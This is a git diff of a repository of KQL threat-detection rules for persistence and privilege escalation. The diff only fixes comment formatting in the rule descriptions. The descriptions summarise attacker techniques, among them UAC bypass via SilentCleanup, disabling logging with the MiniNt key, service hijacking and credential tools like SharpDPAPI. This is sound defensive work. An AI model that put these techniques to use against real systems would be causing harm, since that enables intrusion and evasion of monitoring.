+++ b/KQL/rules/Persistence/potentially_suspicious_malware_callback_communication_linux.kql
@@ -3,7 +3,6 @@
 // Date: 2024-05-10
 // Level: high
 // Description: Detects programs that connect to known malware callback ports based on threat intelligence reports.
-
 // MITRE Tactic: Persistence
 // Tags: attack.persistence, attack.command-and-control, attack.t1571
diff --git a/KQL/rules/Persistence/process_explorer_driver_creation_by_non_sysinternals_binary.kql b/KQL/rules/Persistence/process_explorer_driver_creation_by_non_sysinternals_binary.kql
index a69d2037..65577a7d 100644
--- a/KQL/rules/Persistence/process_explorer_driver_creation_by_non_sysinternals_binary.kql
+++ b/KQL/rules/Persistence/process_explorer_driver_creation_by_non_sysinternals_binary.kql
@@ -3,8 +3,7 @@
 // Date: 2023-05-05
 // Level: high
 // Description: Detects creation of the Process Explorer drivers by processes other than Process Explorer (procexp) itself.
-Hack tools or malware may use the Process Explorer driver to elevate privileges, drops it to disk for a few moments, runs a service using that driver and removes it afterwards.
-
+// Hack tools or malware may use the Process Explorer driver to elevate privileges, drops it to disk for a few moments, runs a service using that driver and removes it afterwards.
 // MITRE Tactic: Persistence
 // Tags: attack.persistence, attack.privilege-escalation, attack.t1068
 // False Positives:
diff --git a/KQL/rules/Persistence/register_new_ifiltre_for_persistence.kql b/KQL/rules/Persistence/register_new_ifiltre_for_persistence.kql
index 7b51cf2f..41a02e7d 100644
--- a/KQL/rules/Persistence/register_new_ifiltre_for_persistence.kql
+++ b/KQL/rules/Persistence/register_new_ifiltre_for_persistence.kql
@@ -3,8 +3,7 @@
 // Date: 2022-07-21
 // Level: medium
 // Description: Detects when an attacker registers a new IFilter for an extension. Microsoft Windows Search uses filters to extract the content of items for inclusion in a full-text index.
-You can extend Windows Search to index new or proprietary file types by writing filters to extract the content, and property handlers to extract the properties of files.
-
+// You can extend Windows Search to index new or proprietary file types by writing filters to extract the content, and property handlers to extract the properties of files.
 // MITRE Tactic: Persistence
 // Tags: attack.persistence
 // False Positives:
diff --git a/KQL/rules/Persistence/registry_manipulation_via_wmi_stdregprov.kql b/KQL/rules/Persistence/registry_manipulation_via_wmi_stdregprov.kql
index 1f0aaf0a..9acd1ea3 100644
--- a/KQL/rules/Persistence/registry_manipulation_via_wmi_stdregprov.kql
+++ b/KQL/rules/Persistence/registry_manipulation_via_wmi_stdregprov.kql
@@ -3,9 +3,8 @@
 // Date: 2025-07-30
 // Level: medium
 // Description: Detects the usage of wmic.exe to manipulate Windows registry via the WMI StdRegProv class.
-This behaviour could be potentially suspicious because it uses an alternative method to modify registry keys instead of legitimate registry tools like reg.exe or regedit.exe.
-Attackers specifically choose this technique to evade detection and bypass security monitoring focused on traditional registry modification commands.
-
+// This behaviour could be potentially suspicious because it uses an alternative method to modify registry keys instead of legitimate registry tools like reg.exe or regedit.exe.
+// Attackers specifically choose this technique to evade detection and bypass security monitoring focused on traditional registry modification commands.
 // MITRE Tactic: Persistence
 // Tags: attack.persistence, attack.execution, attack.defense-evasion, attack.discovery, attack.t1047, attack.t1112, attack.t1012
 // False Positives:
diff --git a/KQL/rules/Persistence/remote_access_tool_anydesk_incoming_connection.kql b/KQL/rules/Persistence/remote_access_tool_anydesk_incoming_connection.kql
index 12c4e84e..63172d2a 100644
--- a/KQL/rules/Persistence/remote_access_tool_anydesk_incoming_connection.kql
+++ b/KQL/rules/Persistence/remote_access_tool_anydesk_incoming_connection.kql
@@ -3,7 +3,6 @@
 // Date: 2024-09-02
 // Level: medium
 // Description: Detects incoming connections to AnyDesk. This could indicate a potential remote attacker trying to connect to a listening instance of AnyDesk and use it as potential command and control channel.
-
 // MITRE Tactic: Persistence
 // Tags: attack.persistence, attack.command-and-control, attack.t1219.002
 // False Positives:
diff --git a/KQL/rules/Persistence/remote_access_tool_team_viewer_session_started_on_linux_host.kql b/KQL/rules/Persistence/remote_access_tool_team_viewer_session_started_on_linux_host.kql
index 55485657..824167a2 100644
--- a/KQL/rules/Persistence/remote_access_tool_team_viewer_session_started_on_linux_host.kql
+++ b/KQL/rules/Persistence/remote_access_tool_team_viewer_session_started_on_linux_host.kql
@@ -3,8 +3,7 @@
 // Date: 2024-03-11
 // Level: low
 // Description: Detects the command line executed when TeamViewer starts a session started by a remote host.
-Once a connection has been started, an investigator can verify the connection details by viewing the "incoming_connections.txt" log file in the TeamViewer folder.
-
+// Once a connection has been started, an investigator can verify the connection details by viewing the "incoming_connections.txt" log file in the TeamViewer folder.
 // MITRE Tactic: Persistence
 // Tags: attack.persistence, attack.initial-access, attack.t1133
 // False Positives:
diff --git a/KQL/rules/Persistence/remote_access_tool_team_viewer_session_started_on_macos_host.kql b/KQL/rules/Persistence/remote_access_tool_team_viewer_session_started_on_macos_host.kql
index 65bc92f3..09ce1d7b 100644
--- a/KQL/rules/Persistence/remote_access_tool_team_viewer_session_started_on_macos_host.kql
+++ b/KQL/rules/Persistence/remote_access_tool_team_viewer_session_started_on_macos_host.kql
@@ -3,8 +3,7 @@
 // Date: 2024-03-11
 // Level: low
 // Description: Detects the command line executed when TeamViewer starts a session started by a remote host.
-Once a connection has been started, an investigator can verify the connection details by viewing the "incoming_connections.txt" log file in the TeamViewer folder.
-
+// Once a connection has been started, an investigator can verify the connection details by viewing the "incoming_connections.txt" log file in the TeamViewer folder.
 // MITRE Tactic: Persistence
 // Tags: attack.persistence, attack.initial-access, attack.t1133
 // False Positives:
diff --git a/KQL/rules/Persistence/remote_access_tool_team_viewer_session_started_on_windows_host.kql b/KQL/rules/Persistence/remote_access_tool_team_viewer_session_started_on_windows_host.kql
index b101c7c0..9e3f57aa 100644
--- a/KQL/rules/Persistence/remote_access_tool_team_viewer_session_started_on_windows_host.kql
+++ b/KQL/rules/Persistence/remote_access_tool_team_viewer_session_started_on_windows_host.kql
@@ -3,8 +3,7 @@
 // Date: 2024-03-11
 // Level: low
 // Description: Detects the command line executed when TeamViewer starts a session started by a remote host.
-Once a connection has been started, an investigator can verify the connection details by viewing the "incoming_connections.txt" log file in the TeamViewer folder.
-
+// Once a connection has been started, an investigator can verify the connection details by viewing the "incoming_connections.txt" log file in the TeamViewer folder.
 // MITRE Tactic: Persistence
 // Tags: attack.persistence, attack.initial-access, attack.t1133
 // False Positives:
diff --git a/KQL/rules/Persistence/removal_of_potential_com_hijacking_registry_keys.kql b/KQL/rules/Persistence/removal_of_potential_com_hijacking_registry_keys.kql
index 80578c80..05e6c37f 100644
--- a/KQL/rules/Persistence/removal_of_potential_com_hijacking_registry_keys.kql
+++ b/KQL/rules/Persistence/removal_of_potential_com_hijacking_registry_keys.kql
@@ -3,8 +3,7 @@
 // Date: 2020-05-02
 // Level: medium
 // Description: Detects any deletion of entries in ".*\shell\open\command" registry keys.
-These registry keys might have been used for COM hijacking activities by a threat actor or an attacker and the deletion could indicate steps to remove its tracks.
-
+// These registry keys might have been used for COM hijacking activities by a threat actor or an attacker and the deletion could indicate steps to remove its tracks.
 // MITRE Tactic: Persistence
 // Tags: attack.persistence, attack.defense-evasion, attack.t1112
 // False Positives:
diff --git a/KQL/rules/Persistence/restrictedadminmode_registry_value_tampering.kql b/KQL/rules/Persistence/restrictedadminmode_registry_value_tampering.kql
index 1c40d43f..fafaffef 100644
--- a/KQL/rules/Persistence/restrictedadminmode_registry_value_tampering.kql
+++ b/KQL/rules/Persistence/restrictedadminmode_registry_value_tampering.kql
@@ -3,9 +3,8 @@
 // Date: 2023-01-13
 // Level: high
 // Description: Detects changes to the "DisableRestrictedAdmin" registry value in order to disable or enable RestrictedAdmin mode.
-RestrictedAdmin mode prevents the transmission of reusable credentials to the remote system to which you connect using Remote Desktop.
-This prevents your credentials from being harvested during the initial connection process if the remote server has been compromise
-
+// RestrictedAdmin mode prevents the transmission of reusable credentials to the remote system to which you connect using Remote Desktop.
+// This prevents your credentials from being harvested during the initial connection process if the remote server has been compromise
 // MITRE Tactic: Persistence
 // Tags: attack.persistence, attack.defense-evasion, attack.t1112
diff --git a/KQL/rules/Persistence/restrictedadminmode_registry_value_tampering_proccreation.kql b/KQL/rules/Persistence/restrictedadminmode_registry_value_tampering_proccreation.kql
index 382a86be..aa1efd7c 100644
--- a/KQL/rules/Persistence/restrictedadminmode_registry_value_tampering_proccreation.kql
+++ b/KQL/rules/Persistence/restrictedadminmode_registry_value_tampering_proccreation.kql
@@ -3,9 +3,8 @@
 // Date: 2023-01-13
 // Level: high
 // Description: Detects changes to the "DisableRestrictedAdmin" registry value in order to disable or enable RestrictedAdmin mode.
-RestrictedAdmin mode prevents the transmission of reusable credentials to the remote system to which you connect using Remote Desktop.
-This prevents your credentials from being harvested during the initial connection process if the remote server has been compromise
-
+// RestrictedAdmin mode prevents the transmission of reusable credentials to the remote system to which you connect using Remote Desktop.
+// This prevents your credentials from being harvested during the initial connection process if the remote server has been compromise
 // MITRE Tactic: Persistence
 // Tags: attack.persistence, attack.defense-evasion, attack.t1112
diff --git a/KQL/rules/Persistence/security_event_logging_disabled_via_minint_registry_key_process.kql b/KQL/rules/Persistence/security_event_logging_disabled_via_minint_registry_key_process.kql
index 33fe2edb..40bb3976 100644
--- a/KQL/rules/Persistence/security_event_logging_disabled_via_minint_registry_key_process.kql
+++ b/KQL/rules/Persistence/security_event_logging_disabled_via_minint_registry_key_process.kql
@@ -3,9 +3,8 @@
 // Date: 2025-04-09
 // Level: high
 // Description: Detects attempts to disable security event logging by adding the `MiniNt` registry key.
-This key is used to disable the Windows Event Log service, which collects and stores event logs from the operating system and applications.
-Adversaries may want to disable this service to prevent logging of security events that could be used to detect their activities.
-
+// This key is used to disable the Windows Event Log service, which collects and stores event logs from the operating system and applications.
+// Adversaries may want to disable this service to prevent logging of security events that could be used to detect their activities.
 // MITRE Tactic: Persistence
 // Tags: attack.persistence, attack.defense-evasion, attack.t1562.002, attack.t1112, car.2022-03-001
 // False Positives:
diff --git a/KQL/rules/Persistence/security_event_logging_disabled_via_minint_registry_key_registry_set.kql b/KQL/rules/Persistence/security_event_logging_disabled_via_minint_registry_key_registry_set.kql
index 3d5077f1..af522520 100644
--- a/KQL/rules/Persistence/security_event_logging_disabled_via_minint_registry_key_registry_set.kql
+++ b/KQL/rules/Persistence/security_event_logging_disabled_via_minint_registry_key_registry_set.kql
@@ -3,9 +3,8 @@
 // Date: 2025-04-09
 // Level: high
 // Description: Detects the addition of the 'MiniNt' key to the registry. Upon a reboot, Windows Event Log service will stop writing events.
-Windows Event Log is a service that collects and stores event logs from the operating system and applications. It is an important component of Windows security and auditing.
-Adversary may want to disable this service to disable logging of security events which could be used to detect their activities.
-
+// Windows Event Log is a service that collects and stores event logs from the operating system and applications. It is an important component of Windows security and auditing.
+// Adversary may want to disable this service to disable logging of security events which could be used to detect their activities.
 // MITRE Tactic: Persistence
 // Tags: attack.persistence, attack.defense-evasion, attack.t1562.002, attack.t1112, car.2022-03-001
 // False Positives:
diff --git a/KQL/rules/Persistence/servicedll_hijack.kql b/KQL/rules/Persistence/servicedll_hijack.kql
index 7c54ba65..0ebe5ce0 100644
--- a/KQL/rules/Persistence/servicedll_hijack.kql
+++ b/KQL/rules/Persistence/servicedll_hijack.kql
@@ -3,8 +3,7 @@
 // Date: 2022-02-04
 // Level: medium
 // Description: Detects changes to the "ServiceDLL" value related to a service in the registry.
-This is often used as a method of persistence.
-
+// This is often used as a method of persistence.
 // MITRE Tactic: Persistence
 // Tags: attack.persistence, attack.privilege-escalation, attack.t1543.003
 // False Positives:
diff --git a/KQL/rules/Persistence/startup_item_file_created_macos.kql b/KQL/rules/Persistence/startup_item_file_created_macos.kql
index 1df6ef62..c1543493 100644
--- a/KQL/rules/Persistence/startup_item_file_created_macos.kql
+++ b/KQL/rules/Persistence/startup_item_file_created_macos.kql
@@ -3,9 +3,8 @@
 // Date: 2020-10-14
 // Level: low
 // Description: Detects the creation of a startup item plist file, that automatically get executed at boot initialization to establish persistence.
-Adversaries may use startup items automatically executed at boot initialization to establish persistence.
-Startup items execute during the final phase of the boot process and contain shell scripts or other executable files along with configuration information used by the system to determine the execution order for all startup items.
-
+// Adversaries may use startup items automatically executed at boot initialization to establish persistence.
+// Startup items execute during the final phase of the boot process and contain shell scripts or other executable files along with configuration information used by the system to determine the execution order for all startup items.
 // MITRE Tactic: Persistence
 // Tags: attack.persistence, attack.privilege-escalation, attack.t1037.005
 // False Positives:
diff --git a/KQL/rules/Persistence/suspicious_file_write_to_webapps_root_directory.kql b/KQL/rules/Persistence/suspicious_file_write_to_webapps_root_directory.kql
index 894d04d5..1eb691f2 100644
--- a/KQL/rules/Persistence/suspicious_file_write_to_webapps_root_directory.kql
+++ b/KQL/rules/Persistence/suspicious_file_write_to_webapps_root_directory.kql
@@ -3,8 +3,7 @@
 // Date: 2025-10-20
 // Level: medium
 // Description: Detects suspicious file writes to the root directory of web applications, particularly Apache web servers or Tomcat servers.
-This may indicate an attempt to deploy malicious files such as web shells or other unauthorized scripts.
-
+// This may indicate an attempt to deploy malicious files such as web shells or other unauthorized scripts.
 // MITRE Tactic: Persistence
 // Tags: attack.persistence, attack.t1505.003, attack.initial-access, attack.t1190
diff --git a/KQL/rules/Persistence/suspicious_process_by_web_server_process.kql b/KQL/rules/Persistence/suspicious_process_by_web_server_process.kql
index 5ac1d12c..ec98b945 100644
--- a/KQL/rules/Persistence/suspicious_process_by_web_server_process.kql
+++ b/KQL/rules/Persistence/suspicious_process_by_web_server_process.kql
@@ -3,7 +3,6 @@
 // Date: 2019-01-16
 // Level: high
 // Description: Detects potentially suspicious processes being spawned by a web server process which could be the result of a successfully placed web shell or exploitation
-
 // MITRE Tactic: Persistence
 // Tags: attack.persistence, attack.initial-access, attack.t1505.003, attack.t1190
 // False Positives:
diff --git a/KQL/rules/Persistence/suspicious_screensave_change_by_reg_exe.kql b/KQL/rules/Persistence/suspicious_screensave_change_by_reg_exe.kql
index ad351cb9..01395494 100644
--- a/KQL/rules/Persistence/suspicious_screensave_change_by_reg_exe.kql
+++ b/KQL/rules/Persistence/suspicious_screensave_change_by_reg_exe.kql
@@ -3,8 +3,7 @@
 // Date: 2021-08-19
 // Level: medium
 // Description: Adversaries may establish persistence by executing malicious content triggered by user inactivity.
-Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension
-
+// Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension
 // MITRE Tactic: Persistence
 // Tags: attack.persistence, attack.privilege-escalation, attack.t1546.002
 // False Positives:
diff --git a/KQL/rules/Persistence/suspicious_vboxdrvinst_exe_parameters.kql b/KQL/rules/Persistence/suspicious_vboxdrvinst_exe_parameters.kql
index 9d6e36d2..34a9f69f 100644
--- a/KQL/rules/Persistence/suspicious_vboxdrvinst_exe_parameters.kql
+++ b/KQL/rules/Persistence/suspicious_vboxdrvinst_exe_parameters.kql
@@ -3,9 +3,8 @@
 // Date: 2020-10-06
 // Level: medium
 // Description: Detect VBoxDrvInst.exe run with parameters allowing processing INF file.
-This allows to create values in the registry and install drivers.
-For example one could use this technique to obtain persistence via modifying one of Run or RunOnce registry keys
-
+// This allows to create values in the registry and install drivers.
+// For example one could use this technique to obtain persistence via modifying one of Run or RunOnce registry keys
 // MITRE Tactic: Persistence
 // Tags: attack.persistence, attack.defense-evasion, attack.t1112
 // False Positives:
diff --git a/KQL/rules/Persistence/trusted_path_bypass_via_windows_directory_spoofing.kql b/KQL/rules/Persistence/trusted_path_bypass_via_windows_directory_spoofing.kql
index a0f6f88c..5a550630 100644
--- a/KQL/rules/Persistence/trusted_path_bypass_via_windows_directory_spoofing.kql
+++ b/KQL/rules/Persistence/trusted_path_bypass_via_windows_directory_spoofing.kql
@@ -3,8 +3,7 @@
 // Date: 2025-06-17
 // Level: high
 // Description: Detects DLLs loading from a spoofed Windows directory path with an extra space (e.g "C:\Windows \System32") which can bypass Windows trusted path verification.
-This technique tricks Windows into treating the path as trusted, allowing malicious DLLs to load with high integrity privileges bypassing UAC.
-
+// This technique tricks Windows into treating the path as trusted, allowing malicious DLLs to load with high integrity privileges bypassing UAC.
 // MITRE Tactic: Persistence
 // Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.007, attack.t1548.002
 // False Positives:
diff --git a/KQL/rules/Persistence/uncommon_extension_shim_database_installation_via_sdbinst_exe.kql b/KQL/rules/Persistence/uncommon_extension_shim_database_installation_via_sdbinst_exe.kql
index e0664bca..ade7cbe0 100644
--- a/KQL/rules/Persistence/uncommon_extension_shim_database_installation_via_sdbinst_exe.kql
+++ b/KQL/rules/Persistence/uncommon_extension_shim_database_installation_via_sdbinst_exe.kql
@@ -3,8 +3,7 @@
 // Date: 2023-08-01
 // Level: medium
 // Description: Detects installation of a potentially suspicious new shim with an uncommon extension using sdbinst.exe.
-Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims
-
+// Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims
 // MITRE Tactic: Persistence
 // Tags: attack.persistence, attack.privilege-escalation, attack.t1546.011
diff --git a/KQL/rules/Persistence/wdigest_credguard_registry_modification.kql b/KQL/rules/Persistence/wdigest_credguard_registry_modification.kql
index d6174c64..be1916c4 100644
--- a/KQL/rules/Persistence/wdigest_credguard_registry_modification.kql
+++ b/KQL/rules/Persistence/wdigest_credguard_registry_modification.kql
@@ -3,9 +3,8 @@
 // Date: 2019-08-25
 // Level: high
 // Description: Detects potential malicious modification of the property value of IsCredGuardEnabled from
-HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest to disable Cred Guard on a system.
-This is usually used with UseLogonCredential to manipulate the caching credentials.
-
+// HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest to disable Cred Guard on a system.
+// This is usually used with UseLogonCredential to manipulate the caching credentials.
 // MITRE Tactic: Persistence
 // Tags: attack.persistence, attack.defense-evasion, attack.t1112
diff --git a/KQL/rules/Persistence/webshell_hacking_activity_patterns.kql b/KQL/rules/Persistence/webshell_hacking_activity_patterns.kql
index f3b27cb8..1434620c 100644
--- a/KQL/rules/Persistence/webshell_hacking_activity_patterns.kql
+++ b/KQL/rules/Persistence/webshell_hacking_activity_patterns.kql
@@ -3,7 +3,6 @@
 // Date: 2022-03-17
 // Level: high
 // Description: Detects certain parent child patterns found in cases in which a web shell is used to perform certain credential dumping or exfiltration activities on a compromised system
-
 // MITRE Tactic: Persistence
 // Tags: attack.persistence, attack.discovery, attack.t1505.003, attack.t1018, attack.t1033, attack.t1087
 // False Positives:
diff --git a/KQL/rules/Persistence/webshell_tool_reconnaissance_activity.kql b/KQL/rules/Persistence/webshell_tool_reconnaissance_activity.kql
index f94bdfd8..839d3e99 100644
--- a/KQL/rules/Persistence/webshell_tool_reconnaissance_activity.kql
+++ b/KQL/rules/Persistence/webshell_tool_reconnaissance_activity.kql
@@ -3,7 +3,6 @@
 // Date: 2020-07-22
 // Level: high
 // Description: Detects processes spawned from web servers (PHP, Tomcat, IIS, etc.) that perform reconnaissance looking for the existence of popular scripting tools (perl, python, wget) on the system via the help commands
-
 // MITRE Tactic: Persistence
 // Tags: attack.persistence, attack.t1505.003
diff --git a/KQL/rules/Persistence/winlogon_allowmultipletssessions_enable.kql b/KQL/rules/Persistence/winlogon_allowmultipletssessions_enable.kql
index 14eacb11..6eda5468 100644
--- a/KQL/rules/Persistence/winlogon_allowmultipletssessions_enable.kql
+++ b/KQL/rules/Persistence/winlogon_allowmultipletssessions_enable.kql
@@ -3,9 +3,8 @@
 // Date: 2022-09-09
 // Level: medium
 // Description: Detects when the 'AllowMultipleTSSessions' value is enabled.
-Which allows for multiple Remote Desktop connection sessions to be opened at once.
-This is often used by attacker as a way to connect to an RDP session without disconnecting the other users
-
+// Which allows for multiple Remote Desktop connection sessions to be opened at once.
+// This is often used by attacker as a way to connect to an RDP session without disconnecting the other users
 // MITRE Tactic: Persistence
 // Tags: attack.persistence, attack.defense-evasion, attack.t1112
 // False Positives:
diff --git a/KQL/rules/Privilege Escalation/add_port_monitor_persistence_in_registry.kql b/KQL/rules/Privilege Escalation/add_port_monitor_persistence_in_registry.kql
index fca1812a..9b430f8c 100644
--- a/KQL/rules/Privilege Escalation/add_port_monitor_persistence_in_registry.kql
+++ b/KQL/rules/Privilege Escalation/add_port_monitor_persistence_in_registry.kql
@@ -3,8 +3,7 @@
 // Date: 2021-12-30
 // Level: medium
 // Description: Adversaries may use port monitors to run an attacker supplied DLL during system boot for persistence or privilege escalation.
-A port monitor can be set through the AddMonitor API call to set a DLL to be loaded at startup.
-
+// A port monitor can be set through the AddMonitor API call to set a DLL to be loaded at startup.
 // MITRE Tactic: Privilege Escalation
 // Tags: attack.privilege-escalation, attack.persistence, attack.t1547.010
diff --git a/KQL/rules/Privilege Escalation/bypass_uac_using_silentcleanup_task.kql b/KQL/rules/Privilege Escalation/bypass_uac_using_silentcleanup_task.kql
index 6a19b8be..150fd39b 100644
--- a/KQL/rules/Privilege Escalation/bypass_uac_using_silentcleanup_task.kql
+++ b/KQL/rules/Privilege Escalation/bypass_uac_using_silentcleanup_task.kql
@@ -3,9 +3,8 @@
 // Date: 2022-01-06
 // Level: high
 // Description: Detects the setting of the environement variable "windir" to a non default value.
-Attackers often abuse this variable in order to trigger a UAC bypass via the "SilentCleanup" task.
-The SilentCleanup task located in %windir%\system32\cleanmgr.exe is an auto-elevated task that can be abused to elevate any file with administrator privileges without prompting UAC.
-
+// Attackers often abuse this variable in order to trigger a UAC bypass via the "SilentCleanup" task.
+// The SilentCleanup task located in %windir%\system32\cleanmgr.exe is an auto-elevated task that can be abused to elevate any file with administrator privileges without prompting UAC.
 // MITRE Tactic: Privilege Escalation
 // Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1548.002
diff --git a/KQL/rules/Privilege Escalation/change_default_file_association_to_executable_via_assoc.kql b/KQL/rules/Privilege Escalation/change_default_file_association_to_executable_via_assoc.kql
index 7382ef34..4514039e 100644
--- a/KQL/rules/Privilege Escalation/change_default_file_association_to_executable_via_assoc.kql
+++ b/KQL/rules/Privilege Escalation/change_default_file_association_to_executable_via_assoc.kql
@@ -3,8 +3,7 @@
 // Date: 2022-06-28
 // Level: high
 // Description: Detects when a program changes the default file association of any extension to an executable.
-When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility. Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.
-
+// When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility. Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.
 // MITRE Tactic: Privilege Escalation
 // Tags: attack.privilege-escalation, attack.persistence, attack.t1546.001
diff --git a/KQL/rules/Privilege Escalation/change_default_file_association_via_assoc.kql b/KQL/rules/Privilege Escalation/change_default_file_association_via_assoc.kql
index b8ab39a8..d54b7eed 100644
--- a/KQL/rules/Privilege Escalation/change_default_file_association_via_assoc.kql
+++ b/KQL/rules/Privilege Escalation/change_default_file_association_via_assoc.kql
@@ -3,8 +3,7 @@
 // Date: 2019-10-21
 // Level: low
 // Description: Detects file association changes using the builtin "assoc" command.
-When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility. Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.
-
+// When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility. Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.
 // MITRE Tactic: Privilege Escalation
 // Tags: attack.privilege-escalation, attack.persistence, attack.t1546.001
 // False Positives:
diff --git a/KQL/rules/Privilege Escalation/changing_existing_service_imagepath_value_via_reg_exe.kql b/KQL/rules/Privilege Escalation/changing_existing_service_imagepath_value_via_reg_exe.kql
index 84d3564d..7f8d9a58 100644
--- a/KQL/rules/Privilege Escalation/changing_existing_service_imagepath_value_via_reg_exe.kql
+++ b/KQL/rules/Privilege Escalation/changing_existing_service_imagepath_value_via_reg_exe.kql
@@ -3,9 +3,8 @@
 // Date: 2021-12-30
 // Level: medium
 // Description: Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services.
-Adversaries may use flaws in the permissions for registry to redirect from the originally specified executable to one that they control, in order to launch their own code at Service start.
-Windows stores local service configuration information in the Registry under HKLM\SYSTEM\CurrentControlSet\Services
-
+// Adversaries may use flaws in the permissions for registry to redirect from the originally specified executable to one that they control, in order to launch their own code at Service start.
+// Windows stores local service configuration information in the Registry under HKLM\SYSTEM\CurrentControlSet\Services
 // MITRE Tactic: Privilege Escalation
 // Tags: attack.privilege-escalation, attack.defense-evasion, attack.persistence, attack.t1574.011
diff --git a/KQL/rules/Privilege Escalation/creation_exe_for_service_with_unquoted_path.kql b/KQL/rules/Privilege Escalation/creation_exe_for_service_with_unquoted_path.kql
index 01284022..748895b6 100644
--- a/KQL/rules/Privilege Escalation/creation_exe_for_service_with_unquoted_path.kql
+++ b/KQL/rules/Privilege Escalation/creation_exe_for_service_with_unquoted_path.kql
@@ -3,8 +3,7 @@
 // Date: 2021-12-30
 // Level: high
 // Description: Adversaries may execute their own malicious payloads by hijacking vulnerable file path references.
-Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.
-
+// Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.
 // MITRE Tactic: Privilege Escalation
 // Tags: attack.privilege-escalation, attack.persistence, attack.t1547.009
diff --git a/KQL/rules/Privilege Escalation/default_rdp_port_changed_to_non_standard_port.kql b/KQL/rules/Privilege Escalation/default_rdp_port_changed_to_non_standard_port.kql
index 0cfdabf9..202b8146 100644
--- a/KQL/rules/Privilege Escalation/default_rdp_port_changed_to_non_standard_port.kql
+++ b/KQL/rules/Privilege Escalation/default_rdp_port_changed_to_non_standard_port.kql
@@ -3,9 +3,8 @@
 // Date: 2022-01-01
 // Level: high
 // Description: Detects changes to the default RDP port.
-Remote desktop is a common feature in operating systems. It allows a user to log into a remote system using an interactive session with a graphical user interface.
-Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS).
-
+// Remote desktop is a common feature in operating systems. It allows a user to log into a remote system using an interactive session with a graphical user interface.
+// Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS).
 // MITRE Tactic: Privilege Escalation
 // Tags: attack.privilege-escalation, attack.persistence, attack.t1547.010
diff --git a/KQL/rules/Privilege Escalation/hacktool_hollowreaper_execution.kql b/KQL/rules/Privilege Escalation/hacktool_hollowreaper_execution.kql
index df8f7ea4..8dd598e6 100644
--- a/KQL/rules/Privilege Escalation/hacktool_hollowreaper_execution.kql
+++ b/KQL/rules/Privilege Escalation/hacktool_hollowreaper_execution.kql
@@ -3,8 +3,7 @@
 // Date: 2025-07-01
 // Level: high
 // Description: Detects usage of HollowReaper, a process hollowing shellcode launcher used for stealth payload execution through process hollowing.
-It replaces the memory of a legitimate process with custom shellcode, allowing the attacker to execute payloads under the guise of trusted binaries.
-
+// It replaces the memory of a legitimate process with custom shellcode, allowing the attacker to execute payloads under the guise of trusted binaries.
 // MITRE Tactic: Privilege Escalation
 // Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1055.012
diff --git a/KQL/rules/Privilege Escalation/hacktool_sharpdpapi_execution.kql b/KQL/rules/Privilege Escalation/hacktool_sharpdpapi_execution.kql
index d267a9ad..af05ec45 100644
--- a/KQL/rules/Privilege Escalation/hacktool_sharpdpapi_execution.kql
+++ b/KQL/rules/Privilege Escalation/hacktool_sharpdpapi_execution.kql
@@ -3,8 +3,7 @@
 // Date: 2024-06-26
 // Level: high
 // Description: Detects the execution of the SharpDPAPI tool based on CommandLine flags and PE metadata.
-SharpDPAPI is a C# port of some DPAPI functionality from the Mimikatz project.
-
+// SharpDPAPI is a C# port of some DPAPI functionality from the Mimikatz project.
 // MITRE Tactic: Privilege Escalation
 // Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1134.001, attack.t1134.003
diff --git a/KQL/rules/Privilege Escalation/hktl_sharpsuccessor_privilege_escalation_tool_execution.kql b/KQL/rules/Privilege Escalation/hktl_sharpsuccessor_privilege_escalation_tool_execution.kql
index a757525a..ae3193f5 100644
--- a/KQL/rules/Privilege Escalation/hktl_sharpsuccessor_privilege_escalation_tool_execution.kql
+++ b/KQL/rules/Privilege Escalation/hktl_sharpsuccessor_privilege_escalation_tool_execution.kql
@@ -3,8 +3,7 @@
 // Date: 2025-06-06
 // Level: high
 // Description: Detects the execution of SharpSuccessor, a tool used to exploit the BadSuccessor attack for privilege escalation in WinServer 2025 Active Directory environments.
-Successful usage of this tool can let the attackers gain the domain admin privileges by exploiting the BadSuccessor vulnerability.
-
+// Successful usage of this tool can let the attackers gain the domain admin privileges by exploiting the BadSuccessor vulnerability.
 // MITRE Tactic: Privilege Escalation
 // Tags: attack.privilege-escalation, attack.t1068
diff --git a/KQL/rules/Privilege Escalation/linux_sudo_chroot_execution.kql b/KQL/rules/Privilege Escalation/linux_sudo_chroot_execution.kql
index d2986a52..db20864f 100644
--- a/KQL/rules/Privilege Escalation/linux_sudo_chroot_execution.kql
+++ b/KQL/rules/Privilege Escalation/linux_sudo_chroot_execution.kql
@@ -3,10 +3,9 @@
 // Date: 2025-10-02
 // Level: low
 // Description: Detects the execution of 'sudo' command with '--chroot' option, which is used to change the root directory for command execution.
-Attackers may use this technique to evade detection and execute commands in a modified environment.
